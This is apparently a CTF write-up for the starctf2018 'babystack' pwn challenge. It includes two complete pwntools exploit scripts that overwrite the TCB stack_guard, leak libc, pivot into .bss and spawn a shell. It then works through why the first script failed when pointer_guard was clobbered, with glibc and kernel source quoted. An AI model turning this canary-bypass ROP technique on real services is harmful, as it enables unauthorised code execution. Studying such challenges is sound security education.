Challenge

This is a pwn challenge from starctf2018. The core idea is to bypass the canary check by overwriting the stack_guard value in the TCB structure.

Challenge link: https://github.com/sixstars/starctf2018/tree/master/pwn-babystack

TCB introduction: http://www.openwall.com/lists/oss-security/2018/02/27/5

Environment

  • Ubuntu 18.04, 64-bit
  • libc-2.27

Solution

Since I already roughly knew how the challenge is solved, I grabbed an existing exploit and ran it first, as follows:

#!/usr/bin/python

from pwn import *

context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'INFO'

libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
bin_path = './bs'

libc = ELF(libc_path)
binary = ELF(bin_path)

host = ''
port = 6666

def debug(command=''):
    gdb.attach(p, command)

def exploit():
    #debug('b *0x4009E7\n')
    g = lambda x: next(binary.search(asm(x, os='linux', arch='amd64')))
    pop_rdi = g('pop rdi; ret')
    pop_rsi_pop = g('pop rsi; pop r15; ret')
    leave = g('leave; ret')
    log.info("pop_rdi: " + hex(pop_rdi))
    log.info("pop_rsi_pop: " + hex(pop_rsi_pop))
    log.info("leave: " + hex(leave))

    size = 8300
    p.sendlineafter('send?\n', str(size))

    fakebuf = 0x602f00
    payload = ''
    payload += 'A'*0x1010
    # stack pivot - step 1: overwrite saved rbp with the fake stack
    payload += p64(fakebuf)
    # ROP1 - leak libc
    payload += p64(pop_rdi)
    payload += p64(binary.got['puts'])
    payload += p64(binary.plt['puts'])
    # ROP2 - read the second-stage chain into the fake stack
    payload += p64(pop_rdi)
    payload += p64(0)
    payload += p64(pop_rsi_pop)
    payload += p64(fakebuf)
    payload += p64(0)
    payload += p64(binary.plt['read'])
    # stack pivot - step 2
    payload += p64(leave)
    # Overwrite the TCB canary (stack_guard)
    payload = payload.ljust(size, 'A')

    p.send(payload)
    p.recvuntil('goodbye.\n')
    leak = p.recvline().strip()[-6:].ljust(8, '\0')
    leak = u64(leak)
    libc.address = leak - libc.sym['puts']
    info("%#x", libc.address)
    bin_sh = libc.search('/bin/sh').next()
    system = libc.sym['system']

    payload = ''
    payload += p64(0)
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)

    p.send(payload)
    p.interactive()

if __name__ == '__main__':
    if len(sys.argv) == 1:
        global p
        p = process(executable=bin_path, argv=[bin_path]) #, env={'LD_PRELOAD':libc_path})
    else:
        p = remote(sys.argv[1], int(sys.argv[2]))
    exploit()

I didn't use the official libc here (mainly because I couldn't find it...), and just used the system's libc directly.

The main steps are already covered in the comments; roughly, they are:

  • Work out the offset: first fill 0x1010 "A"s up to rbp (this step also clobbers the on-stack canary with "AAAA")
  • Stack pivot: hijack rbp over to the .bss segment
  • Since libc is built as PIE by default, call puts to leak the absolute address stored in puts's GOT entry
  • Find the pop_rsi_pop, pop_rdi, etc. gadgets to control the registers and prepare the arguments for a read call
  • From the leaked puts address, compute the offset to get libc's base address, and from that base the absolute address of read
  • Build the ROP chain and pad it with "A" up to 8300 bytes (the oversized run of "A"s also overwrites stack_guard in the TCB with "AAAA", bypassing the canary check)
  • Write the chain to the right spot on the stack
  • When the read we planted gets called, write the real payload into the hijacked stack in .bss
  • Finally, leave pivots the stack entirely into .bss, where execution continues

The flow is fairly straightforward, so I ran it.

However, this exploit could not get a shell on my machine, even though it succeeds on Ubuntu 16.04.

Confusion.jpg. Without further ado, time for gdb.

WHY?

Single-stepping in gdb to the point where our final payload executes:

First, we can see the program has indeed been hijacked into system, and rdi does point at the "/bin/sh" string:

enter_system

Everything looks fine so far; let's keep stepping in.

When I stepped to this point, the program crashed:

rax_gg

You can see that <do_system+359> call rax tries to call the function rax points to.

But a closer look at rax shows its value is 0x74e75a79b3d1d1ee, far beyond any accessible memory address.

So naturally, the program crashes here.

Why would rax hold such an abnormal value?

I turned my attention to the assembly just before it, namely <do_system+343> xor rax, QWORD PTR fs:0x30.

XORing 0x74e75a79b3d1d1ee with rax's pre-xor value 0x35a61b38f29090af yields the value of fs:0x30: 0x4141414141414141.
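
A quick sanity check of that arithmetic in plain Python (the two constants are the values observed in the gdb session above):

# rax after the xor and rax before it, as seen in gdb
rax_after  = 0x74e75a79b3d1d1ee
rax_before = 0x35a61b38f29090af

# xor is its own inverse, so this recovers QWORD PTR fs:0x30
print(hex(rax_after ^ rax_before))  # 0x4141414141414141 -- our 'A' padding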

If this still isn't clear, here is the TCB structure for 64-bit programs:

typedef struct
{
  void *tcb;            /* Pointer to the TCB.  Not necessarily the
                           thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;           /* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;      // this member does not exist on 32-bit
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;
  unsigned long int vgetcpu_cache[2];
  /* Bit 0: X86_FEATURE_1_IBT.
     Bit 1: X86_FEATURE_1_SHSTK.  */
  unsigned int feature_1;
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  /* The lowest address of shadow stack.  */
  unsigned long long int ssp_base;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));
  void *__padding[8];
} tcbhead_t;
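
From this layout you can read off the offsets that matter here. A small sketch (the offsets follow the standard x86_64 layout with 8-byte pointers and 4-byte ints; the fs:0x28 and fs:0x30 entries match the assembly we saw):

# tcbhead_t member offsets on x86_64
layout = [
    ('tcb',              0x00),
    ('dtv',              0x08),
    ('self',             0x10),
    ('multiple_threads', 0x18),
    ('gscope_flag',      0x1c),
    ('sysinfo',          0x20),
    ('stack_guard',      0x28),  # what the canary check reads as fs:0x28
    ('pointer_guard',    0x30),  # what do_system reads as fs:0x30
]
for name, off in layout:
    print('fs:0x%02x  %s' % (off, name))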

By now the cause should be clear: fs:0x28 is stack_guard, and the original payload blindly wrote 8300 bytes without computing any offset, so while overwriting stack_guard it also clobbered pointer_guard at fs:0x30 with 0x4141414141414141. In libc 2.27, system's implementation uses this value to demangle a function pointer. The demangling can be seen in the assembly in the screenshot; summarized here (⊕ denotes XOR):

ptr(enc)  = ror64(ptr(orig) ⊕ rand, 0x11)   // rand is the value of pointer_guard
ptr(orig) = rol64(ptr(enc), 0x11) ⊕ rand

On Windows, the decryption scheme is slightly different:

ptr(enc) = ror64(ptr(orig) ⊕ rand, rand)
ptr(orig) = rol64(ptr(enc), rand) ⊕ rand
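
To make the Linux scheme concrete, here is the round trip in plain Python (a sketch of glibc's PTR_MANGLE/PTR_DEMANGLE on x86_64; the pointer value is made up, and rand stands in for pointer_guard):

MASK = (1 << 64) - 1

def ror64(x, n):
    return ((x >> n) | (x << (64 - n))) & MASK

def rol64(x, n):
    return ((x << n) | (x >> (64 - n))) & MASK

rand = 0x4141414141414141      # pointer_guard after our overwrite
ptr  = 0x00007ffff7a33440      # a made-up function pointer

enc = ror64(ptr ^ rand, 0x11)  # PTR_MANGLE
dec = rol64(enc, 0x11) ^ rand  # PTR_DEMANGLE
assert dec == ptr              # only holds if rand is unchanged in between

If pointer_guard changes between the mangle and the demangle, as our overflow made it do, the demangled pointer is garbage; that is exactly the bogus rax we saw.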

A quick word on what pointer_guard is for: it protects function addresses stored in user-readable/writable memory, preventing an attacker from recovering the real function address and thereby bypassing mitigations such as ASLR.

From the two schemes above, Windows and Linux encrypt and decrypt the same way (apart from the fixed 0x11), but in practice they handle the rand value very differently.

In our exploit, we overwrote this rand value (i.e. pointer_guard) via the stack overflow.

In other words, Linux stores rand in the TCB, and the TCB can be read and written by user code.

Windows does not: it keeps the value in the kernel, where user mode can neither modify nor read it (if you have a kernel bug, pretend I said nothing).

So Linux's implementation of this mechanism is, in effect, unsafe (and by the same reasoning, stack_guard is in the same boat as pointer_guard).

The failed demangling is what triggered the crash.

The fix is actually simple: stack_guard sits at a lower address than pointer_guard, so we only need to compute the overwrite length precisely and stop right at stack_guard.

Using the command x/32gx pthread_self() I inspected the TCB layout and its address, and determined the offset between stack_guard and the overflowed buffer buf.
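
The length computation is then simple arithmetic. A sketch (the two addresses are hypothetical stand-ins for what you read out of that gdb session):

# addresses observed in gdb (hypothetical values for illustration)
buf_addr         = 0x7ffff7fd8010   # start of the overflowed buffer
stack_guard_addr = 0x7ffff7fd9858   # pthread_self() + 0x28

# overwrite up to and including stack_guard (8 bytes),
# but stop before pointer_guard at stack_guard_addr + 8
size = stack_guard_addr - buf_addr + 8
print(hex(size))                    # 0x1850 with these values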

TIPS: in gdb you cannot directly see the address fs really points to. In protected mode, a segment register no longer holds a base address but a segment selector: the visible 16-bit value of every segment register is a selector, the real base address is hidden, and you must look the selector up in the GDT or LDT to recover that hidden base. fs/gs are the exception (on linux x86_64): they behave differently from the other four segment registers in protected mode. For 64-bit programs on linux x86_64, their visible 16-bit value is not a selector at all but is always 0. Yet we know fs holds the (invisible) base address of the thread's TCB. So if the visible value is always 0, what changes that invisible TCB base address?

The answer: when switching threads, the CPU's fs base is rewritten directly via wrmsr to the current thread's TCB start address.

Debugging shows that glibc, before the thread starts running, actively calls TLS_INIT_TP -> arch_prctl (a syscall) to change the fs base address. Part of the code follows:

101
/* Code to initially initialize the thread pointer.  This might need
   special attention since 'errno' is not yet available and if the
   operation can cause a failure 'errno' must not be touched.

   We have to make the syscall for both uses of the macro since the
   address might be (and probably is) different.  */
# define TLS_INIT_TP(thrdescr) \
  ({ void *_thrdescr = (thrdescr);                                     \
     tcbhead_t *_head = _thrdescr;                                     \
     int _result;                                                      \
                                                                       \
     _head->tcb = _thrdescr;                                           \
     /* For now the thread descriptor is at the same address.  */      \
     _head->self = _thrdescr;                                          \
                                                                       \
     /* It is a simple syscall to set the %fs value for the thread.  */\
     asm volatile ("syscall"                                           \
                   : "=a" (_result)                                    \
                   : "0" ((unsigned long int) __NR_arch_prctl),        \
                     "D" ((unsigned long int) ARCH_SET_FS),            \
                     "S" (_thrdescr)                                   \
                   : "memory", "cc", "r11", "cx");                     \
                                                                       \
    _result ? "cannot set %fs base address for thread-local storage" : 0; \
  })
......
// Implementation of the arch_prctl system call
long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
{
    int ret = 0;
    int doit = task == current;
    int cpu;

    switch (code) {
    case ARCH_SET_GS:
        if (addr >= TASK_SIZE_OF(task))
            return -EPERM;
        cpu = get_cpu();
        /* handle small bases via the GDT because that's faster to
           switch. */
        if (addr <= 0xffffffff) {
            set_32bit_tls(task, GS_TLS, addr);
            if (doit) {
                load_TLS(&task->thread, cpu);
                load_gs_index(GS_TLS_SEL);
            }
            task->thread.gsindex = GS_TLS_SEL;
            task->thread.gs = 0;
        } else {
            task->thread.gsindex = 0;
            task->thread.gs = addr;
            if (doit) {
                load_gs_index(0);
                ret = wrmsrl_safe(MSR_KERNEL_GS_BASE, addr);
            }
        }
        put_cpu();
        break;
    case ARCH_SET_FS:
        /* Not strictly needed for fs, but do it for symmetry
           with gs */
        if (addr >= TASK_SIZE_OF(task))
            return -EPERM;
        cpu = get_cpu();
        /* handle small bases via the GDT because that's faster to
           switch. */
        if (addr <= 0xffffffff) { // qemu + 64-bit kernel + busybox + 64-bit binary ends up in this branch; this seems to be a special case, regular releases don't do this
            set_32bit_tls(task, FS_TLS, addr); // a 32-bit address means segment addressing is still in use: update the matching descriptor in the GDT (though this calls fill_ldt), indirectly changing the base
            if (doit) {
                load_TLS(&task->thread, cpu);
                loadsegment(fs, FS_TLS_SEL);
            }
            task->thread.fsindex = FS_TLS_SEL;
            task->thread.fs = 0;
        } else {
            task->thread.fsindex = 0;
            task->thread.fs = addr;
            if (doit) { // if the calling thread is the one currently running on this CPU, zero fs and load the fs base right away, so the kernel need not repeat this when switching threads
                /* set the selector to 0 to not confuse
                   __switch_to */
                loadsegment(fs, 0); // load fs with 0
                ret = wrmsrl_safe(MSR_FS_BASE, addr); // unlike the 32-bit path, rewrite the base address directly
            }
        }
        put_cpu();
        break;
    (rest omitted)
......
static inline void set_32bit_tls(struct task_struct *t, int tls, u32 addr)
{
    struct user_desc ud = {
        .base_addr = addr,
        .limit = 0xfffff,
        .seg_32bit = 1,
        .limit_in_pages = 1,
        .useable = 1,
    };
    struct desc_struct *desc = t->thread.tls_array;
    desc += tls;
    fill_ldt(desc, &ud);
}
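
Incidentally, you can observe the fs base from user space through the same syscall, using ARCH_GET_FS. A small sketch with ctypes (158 is the x86_64 syscall number for arch_prctl, and 0x1003 is ARCH_GET_FS from asm/prctl.h):

import ctypes

libc = ctypes.CDLL(None, use_errno=True)
SYS_arch_prctl = 158     # x86_64 syscall number
ARCH_GET_FS    = 0x1003  # from asm/prctl.h

fsbase = ctypes.c_ulong(0)
assert libc.syscall(SYS_arch_prctl, ARCH_GET_FS, ctypes.byref(fsbase)) == 0
# fsbase.value is the TCB base: +0x28 is stack_guard, +0x30 is pointer_guard
print(hex(fsbase.value))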

Of course, the kernel also performs checks when scheduling threads, making sure the next thread to be scheduled has the correct fsindex and base value.

/*
 * switch_to(x,y) should switch tasks from x to y.
 *
 * This could still be optimized:
 * - fold all the options into a flag word and test it with a single test.
 * - could test fs/gs bitsliced
 *
 * Kprobes not supported here. Set the probe on schedule instead.
 * Function graph tracer not supported too.
 */
__visible __notrace_funcgraph struct task_struct *
__switch_to(struct task_struct *prev_p, struct task_struct *next_p)
{
    struct thread_struct *prev = &prev_p->thread;
    struct thread_struct *next = &next_p->thread;
    struct fpu *prev_fpu = &prev->fpu;
    struct fpu *next_fpu = &next->fpu;
    int cpu = smp_processor_id();
    struct tss_struct *tss = &per_cpu(cpu_tss, cpu);
    unsigned fsindex, gsindex;
    fpu_switch_t fpu_switch;

    fpu_switch = switch_fpu_prepare(prev_fpu, next_fpu, cpu);

    /* We must save %fs and %gs before load_TLS() because
     * %fs and %gs may be cleared by load_TLS().
     *
     * (e.g. xen_load_tls())
     */
    savesegment(fs, fsindex);
    savesegment(gs, gsindex);

    /*
     * Load TLS before restoring any segments so that segment loads
     * reference the correct GDT entries.
     */
    load_TLS(next, cpu);

    /*
     * Leave lazy mode, flushing any hypercalls made here. This
     * must be done after loading TLS entries in the GDT but before
     * loading segments that might reference them, and and it must
     * be done before fpu__restore(), so the TS bit is up to
     * date.
     */
    arch_end_context_switch(next_p);

    /* Switch DS and ES.
     *
     * Reading them only returns the selectors, but writing them (if
     * nonzero) loads the full descriptor from the GDT or LDT. The
     * LDT for next is loaded in switch_mm, and the GDT is loaded
     * above.
     *
     * We therefore need to write new values to the segment
     * registers on every context switch unless both the new and old
     * values are zero.
     *
     * Note that we don't need to do anything for CS and SS, as
     * those are saved and restored as part of pt_regs.
     */
    savesegment(es, prev->es);
    if (unlikely(next->es | prev->es))
        loadsegment(es, next->es);

    savesegment(ds, prev->ds);
    if (unlikely(next->ds | prev->ds))
        loadsegment(ds, next->ds);

    /*
     * Switch FS and GS.
     *
     * These are even more complicated than DS and ES: they have
     * 64-bit bases are that controlled by arch_prctl. Those bases
     * only differ from the values in the GDT or LDT if the selector
     * is 0.
     *
     * Loading the segment register resets the hidden base part of
     * the register to 0 or the value from the GDT / LDT. If the
     * next base address zero, writing 0 to the segment register is
     * much faster than using wrmsr to explicitly zero the base.
     *
     * The thread_struct.fs and thread_struct.gs values are 0
     * if the fs and gs bases respectively are not overridden
     * from the values implied by fsindex and gsindex. They
     * are nonzero, and store the nonzero base addresses, if
     * the bases are overridden.
     *
     * (fs != 0 && fsindex != 0) || (gs != 0 && gsindex != 0) should
     * be impossible.
     *
     * Therefore we need to reload the segment registers if either
     * the old or new selector is nonzero, and we need to override
     * the base address if next thread expects it to be overridden.
     *
     * This code is unnecessarily slow in the case where the old and
     * new indexes are zero and the new base is nonzero -- it will
     * unnecessarily write 0 to the selector before writing the new
     * base address.
     *
     * Note: This all depends on arch_prctl being the only way that
     * user code can override the segment base. Once wrfsbase and
     * wrgsbase are enabled, most of this code will need to change.
     */
    if (unlikely(fsindex | next->fsindex | prev->fs)) { // perform the check

        loadsegment(fs, next->fsindex);

        /*
         * If user code wrote a nonzero value to FS, then it also
         * cleared the overridden base address.
         *
         * XXX: if user code wrote 0 to FS and cleared the base
         * address itself, we won't notice and we'll incorrectly
         * restore the prior base address next time we reschdule
         * the process.
         */
        if (fsindex)
            prev->fs = 0;
    }
    if (next->fs) // if nonzero, update the fs base directly
        wrmsrl(MSR_FS_BASE, next->fs);
    prev->fsindex = fsindex;

    if (unlikely(gsindex | next->gsindex | prev->gs)) {
        load_gs_index(next->gsindex);

        /* This works (and fails) the same way as fsindex above. */
        if (gsindex)
            prev->gs = 0;
    }
    if (next->gs)
        wrmsrl(MSR_KERNEL_GS_BASE, next->gs);
    prev->gsindex = gsindex;

    switch_fpu_finish(next_fpu, fpu_switch);

    /*
     * Switch the PDA and FPU contexts.
     */
    this_cpu_write(current_task, next_p);

    /* Reload esp0 and ss1. This changes current_thread_info(). */
    load_sp0(tss, next);

    /*
     * Now maybe reload the debug registers and handle I/O bitmaps
     */
    if (unlikely(task_thread_info(next_p)->flags & _TIF_WORK_CTXSW_NEXT ||
                 task_thread_info(prev_p)->flags & _TIF_WORK_CTXSW_PREV))
        __switch_to_xtra(prev_p, next_p, tss);

    if (static_cpu_has_bug(X86_BUG_SYSRET_SS_ATTRS)) {
        /*
         * AMD CPUs have a misfeature: SYSRET sets the SS selector but
         * does not update the cached descriptor. As a result, if we
         * do SYSRET while SS is NULL, we'll end up in user mode with
         * SS apparently equal to __USER_DS but actually unusable.
         *
         * The straightforward workaround would be to fix it up just
         * before SYSRET, but that would slow down the system call
         * fast paths. Instead, we ensure that SS is never NULL in
         * system call context. We do this by replacing NULL SS
         * selectors at every context switch. SYSCALL sets up a valid
         * SS, so the only way to get NULL is to re-enter the kernel
         * from CPL 3 through an interrupt. Since that can't happen
         * in the same task as a running syscall, we are guaranteed to
         * context switch between every interrupt vector entry and a
         * subsequent SYSRET.
         *
         * We read SS first because SS reads are much faster than
         * writes. Out of caution, we force SS to __KERNEL_DS even if
         * it previously had a different non-NULL value.
         */
        unsigned short ss_sel;
        savesegment(ss, ss_sel);
        if (ss_sel != __KERNEL_DS)
            loadsegment(ss, __KERNEL_DS);
    }

    return prev_p;
}

In newer kernels, arch_prctl only serves 64-bit programs running on x86_64; the rest (32-bit programs on x86_64, 32-bit programs on x86) can no longer rely on arch_prctl to update fs/gs. This can also be seen from how glibc implements TLS_INIT_TP for 32-bit programs, shown below:

/* Code to initially initialize the thread pointer.  This might need
   special attention since 'errno' is not yet available and if the
   operation can cause a failure 'errno' must not be touched.  */
# define TLS_INIT_TP(thrdescr) \
  ({ void *_thrdescr = (thrdescr);                                     \
     tcbhead_t *_head = _thrdescr;                                     \
     union user_desc_init _segdescr;                                   \
     int _result;                                                      \
                                                                       \
     _head->tcb = _thrdescr;                                           \
     /* For now the thread descriptor is at the same address.  */      \
     _head->self = _thrdescr;                                          \
     /* New syscall handling support.  */                              \
     INIT_SYSINFO;                                                     \
                                                                       \
     /* Let the kernel pick a value for the 'entry_number' field.  */  \
     tls_fill_user_desc (&_segdescr, -1, _thrdescr);                   \
                                                                       \
     /* Install the TLS.  */                                           \
     INTERNAL_SYSCALL_DECL (err);                                      \
     _result = INTERNAL_SYSCALL (set_thread_area, err, 1, &_segdescr.desc); \
                                                                       \
     if (_result == 0)                                                 \
       /* We know the index in the GDT, now load the segment register. \
          The use of the GDT is described by the value 3 in the lower  \
          three bits of the segment descriptor value.                  \
                                                                       \
          Note that we have to do this even if the numeric value of    \
          the descriptor does not change.  Loading the segment register \
          causes the segment information from the GDT to be loaded     \
          which is necessary since we have changed it.  */             \
       TLS_SET_GS (_segdescr.desc.entry_number * 8 + 3);               \
                                                                       \
     _result == 0 ? NULL                                               \
     : "set_thread_area failed when setting up thread-local storage\n"; })

For 32-bit programs, glibc ensures gsbase points at the TCB base by modifying a segment descriptor in the GDT and the value of the gs segment register (64-bit programs use fs, 32-bit programs use gs).

Moreover, since the segment descriptor is supplied by glibc, when the kernel receives the request issued by INTERNAL_SYSCALL (set_thread_area, err, 1, &_segdescr.desc), besides allocating an entry for glibc, it also saves a copy of the descriptor glibc supplied into the process's task_struct -> thread -> tls_array. On a thread switch, the kernel rewrites the GDT from that saved descriptor, so a single GDT entry can serve N threads.

Here is some of the relevant code:

struct task_struct {
    (many irrelevant members omitted)
    int pagefault_disabled;
    /* CPU-specific state of this task */
    struct thread_struct thread; // records the thread's register state, TLS state, etc.
    /*
     * WARNING: on x86, 'thread_struct' contains a variable-sized
     * structure. It *MUST* be at the end of 'task_struct'.
     *
     * Do not put anything below here!
     */
}
......
struct thread_struct {
    /* Cached TLS descriptors: */
    struct desc_struct tls_array[GDT_ENTRY_TLS_ENTRIES]; // the segment descriptor information is saved in this member
    (many irrelevant members omitted)
}
......
/*
 * switch_to(x,y) should switch tasks from x to y.
 *
 * This could still be optimized:
 * - fold all the options into a flag word and test it with a single test.
 * - could test fs/gs bitsliced
 *
 * Kprobes not supported here. Set the probe on schedule instead.
 * Function graph tracer not supported too.
 */
__visible __notrace_funcgraph struct task_struct *
__switch_to(struct task_struct *prev_p, struct task_struct *next_p)
{
    struct thread_struct *prev = &prev_p->thread;
    struct thread_struct *next = &next_p->thread;
    struct fpu *prev_fpu = &prev->fpu;
    struct fpu *next_fpu = &next->fpu;
    int cpu = smp_processor_id();
    struct tss_struct *tss = &per_cpu(cpu_tss, cpu);
    unsigned fsindex, gsindex;
    fpu_switch_t fpu_switch;

    fpu_switch = switch_fpu_prepare(prev_fpu, next_fpu, cpu);

    /* We must save %fs and %gs before load_TLS() because
     * %fs and %gs may be cleared by load_TLS().
     *
     * (e.g. xen_load_tls())
     */
    savesegment(fs, fsindex);
    savesegment(gs, gsindex);
    /*
     * Load TLS before restoring any segments so that segment loads
     * reference the correct GDT entries.
     */
    load_TLS(next, cpu); // update the GDT on a thread context switch
    (omitted)
}
......
#define load_TLS(t, cpu) native_load_tls(t, cpu)
......
static inline void native_load_tls(struct thread_struct *t, unsigned int cpu)
{
    struct desc_struct *gdt = get_cpu_gdt_table(cpu);
    unsigned int i;
    // update the GDT so the relevant descriptors become those of the thread about to run
    for (i = 0; i < GDT_ENTRY_TLS_ENTRIES; i++)
        gdt[GDT_ENTRY_TLS_MIN + i] = t->tls_array[i];
}

I also ran into an odd issue while debugging: with qemu + 64-bit kernel + busybox + a 64-bit executable, even though the program is 64-bit, the address set via arch_prctl was a 32-bit address; a regular Ubuntu release doesn't behave this way. I may dig into why later.

Let me also summarize the different situations I hit while debugging; the reasons behind each are spelled out in the code and comments above:

  1. qemu + 64-bit old kernel + busybox + 64-bit executable (built with glibc 2.27 + gcc 7.5.0)

    Here arch_prctl sets fs to a 32-bit address, so fs becomes 0x63 and gs stays 0x0; the fs base is not written directly via WRMSR, segment addressing is used instead

  2. qemu + 64-bit old kernel + busybox + 32-bit executable (built with glibc 2.27 + gcc 7.5.0)

    Here arch_prctl is not called; glibc's 32-bit TLS_INIT_TP sets gs to 0x63 while fs stays 0x0; the gs base is not written directly via WRMSR, segment addressing is used instead

  3. 64-bit Ubuntu release (newer kernel) + 32-bit executable (built with glibc 2.27 + gcc 7.5.0)

    Here arch_prctl is not called; glibc's 32-bit TLS_INIT_TP sets gs to 0x63 while fs stays 0x0, same as case 2

  4. 64-bit Ubuntu release (newer kernel) + 64-bit executable (built with glibc 2.27 + gcc 7.5.0)

    Here arch_prctl sets fs to a 64-bit address, so fs becomes 0x0 and gs is also 0x0; arch_prctl writes the fs base directly via WRMSR, and segment addressing is not used

As for how the CPU changes the fs register, the following is excerpted from the [AMD Architecture Programmer's Manual Volume 2: System Programming](https://www.amd.com/system/files/TechDocs/24593.pdf#page=124), section 4.5.3; in the kernel implementation above, the first method is the one used.

FS and GS Registers in 64-Bit Mode. Unlike the CS, DS, ES, and SS segments, the FS and GS segment overrides can be used in 64-bit mode. When FS and GS segment overrides are used in 64-bit mode, their respective base addresses are used in the effective-address (EA) calculation. The complete EA calculation then becomes (FS or GS).base + base + (scale * index) + displacement. The FS.base and GS.base values are also expanded to the full 64-bit virtual-address size, as shown in Figure 4-5. The resulting EA calculation is allowed to wrap across positive and negative addresses.


[...]

There are two methods to update the contents of the FS.base and GS.base hidden descriptor fields. The first is available exclusively to privileged software (CPL = 0). The FS.base and GS.base hidden descriptor-register fields are mapped to MSRs. Privileged software can load a 64-bit base address in canonical form into FS.base or GS.base using a single WRMSR instruction. The FS.base MSR address is C000_0100h while the GS.base MSR address is C000_0101h.

The second method of updating the FS and GS base fields is available to software running at any privilege level (when supported by the implementation and enabled by setting CR4[FSGSBASE]). The WRFSBASE and WRGSBASE instructions copy the contents of a GPR to the FS.base and GS.base fields respectively. When the operand size is 32 bits, the upper doubleword of the base is cleared. WRFSBASE and WRGSBASE are only supported in 64-bit mode.

That is why I resorted to x/32gx pthread_self() to access it.

Below is the implementation of pthread_self() and the key related structures (on linux x86_64). The function simply reads fs:(offset of header.self within struct pthread). From what we established above, fs here stands for the TCB start address, so adding the offset of header.self amounts to reading the self member of tcbhead_t, whose value points at the start of the TCB.

pthread_t
pthread_self (void)
{
  return (pthread_t) THREAD_SELF;
}

......

// THREAD_SELF on 64-bit
/* Return the thread descriptor for the current thread.

   The contained asm must *not* be marked volatile since otherwise
   assignments like
     pthread_descr self = thread_self();
   do not get optimized away.  */
# define THREAD_SELF \
  ({ struct pthread *__self;                                  \
     asm ("mov %%fs:%c1,%0" : "=r" (__self)                   \
          : "i" (offsetof (struct pthread, header.self)));    \
     __self;})

......

// THREAD_SELF on 32-bit
/* Return the thread descriptor for the current thread.

   The contained asm must *not* be marked volatile since otherwise
   assignments like
     pthread_descr self = thread_self();
   do not get optimized away.  */
# define THREAD_SELF \
  ({ struct pthread *__self;                                  \
     asm ("movl %%gs:%c1,%0" : "=r" (__self)                  \
          : "i" (offsetof (struct pthread, header.self)));    \
     __self;})

......

/* Thread descriptor data structure.  */
struct pthread
{
  union
  {
#if !TLS_DTV_AT_TP
    /* This overlaps the TCB as used for TLS without threads (see tls.h).  */
    tcbhead_t header; // the tcbhead_t structure was shown earlier in this post
#else
    struct
    {
      /* multiple_threads is enabled either when the process has spawned at
         least one thread or when a single-threaded process cancels itself.
         This enables additional code to introduce locking before doing some
         compare_and_exchange operations and also enable cancellation points.
         The concepts of multiple threads and cancellation points ideally
         should be separate, since it is not necessary for multiple threads to
         have been created for cancellation points to be enabled, as is the
         case is when single-threaded process cancels itself.

         Since enabling multiple_threads enables additional code in
         cancellation points and compare_and_exchange operations, there is a
         potential for an unneeded performance hit when it is enabled in a
         single-threaded, self-canceling process.  This is OK though, since a
         single-threaded process will enable async cancellation only when it
         looks to cancel itself and is hence going to end anyway.  */
      int multiple_threads;
      int gscope_flag;
# ifndef __ASSUME_PRIVATE_FUTEX
      int private_futex;
# endif
    } header;
#endif

Based on this, the exploit can be modified as follows:

#!/usr/bin/python

from pwn import *

context.os = 'linux'
#context.terminal = ['tmux', 'splitw', '-h']
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'DEBUG'

libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
bin_path = './bs'

libc = ELF(libc_path)
binary = ELF(bin_path)

host = ''
port = 6666


def debug(command=''):
    gdb.attach(p, command)


def exploit():
    # debug('b *0x4009E7\n')
    g = lambda x: next(binary.search(asm(x, os='linux', arch='amd64')))
    pop_rdi = g('pop rdi; ret')
    pop_rsi_pop = g('pop rsi; pop r15; ret')
    leave = g('leave; ret')

    log.info("pop_rdi: " + hex(pop_rdi))
    log.info("pop_rsi_pop: " + hex(pop_rsi_pop))
    log.info("leave: " + hex(leave))

    size = 0x1850
    p.sendlineafter('send?\n', str(size))

    fakebuf = 0x602f00
    payload = ''
    payload += 'A' * 0x1010
    # stack pivot - step 1
    payload += p64(fakebuf)
    # ROP1 - leak libc
    payload += p64(pop_rdi)
    payload += p64(binary.got['puts'])
    payload += p64(binary.plt['puts'])
    # ROP2 - read
    payload += p64(pop_rdi)
    payload += p64(0)
    payload += p64(pop_rsi_pop)
    payload += p64(fakebuf)
    payload += p64(0)
    payload += p64(binary.plt['read'])
    # stack pivot - step 2
    payload += p64(leave)
    # overwrite the TCB canary (stack_guard) and nothing past it
    payload = payload.ljust(size, 'A')
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.send(payload)
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.recvuntil('goodbye.\n')
    leak = p.recv(6) + '\x00\x00'
    leak = u64(leak)
    #info("libc.address is %#x", libc.address)
    #print("leak:", leak)
    #print("sym:", libc.symbols['puts'])
    libc.address = leak - libc.symbols['puts']

    #print("leak:",leak)
    #print("sym:",libc.symbols['puts'])
    info("libc.address is %#x", libc.address)
    bin_sh = libc.search('/bin/sh').next()
    system = libc.sym['system']

    #payload = ''
    #payload += p64(0)
    #payload += p64((libc.address+0x4f3c2))
    payload = ''
    payload += p64(0)
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)

    p.send(payload)
    #print ("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.interactive()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        global p
        p = process(executable=bin_path, argv=[bin_path])  # , env={'LD_PRELOAD':libc_path})
    else:
        p = remote(sys.argv[1], int(sys.argv[2]))
    exploit()

Only the payload length changed: the overwrite now stops at stack_guard.

I thought that was it, but no such luck: running the exploit again still threw an error.

Me: ????????

I assumed I had fixed it wrong and miscalculated the offset, but another gdb session showed the previous crash site now behaves correctly:

also_gg

Very strange. Why does it still fail?

I kept debugging, and also wrote a small program that calls system normally, for comparison:

#include <errno.h>
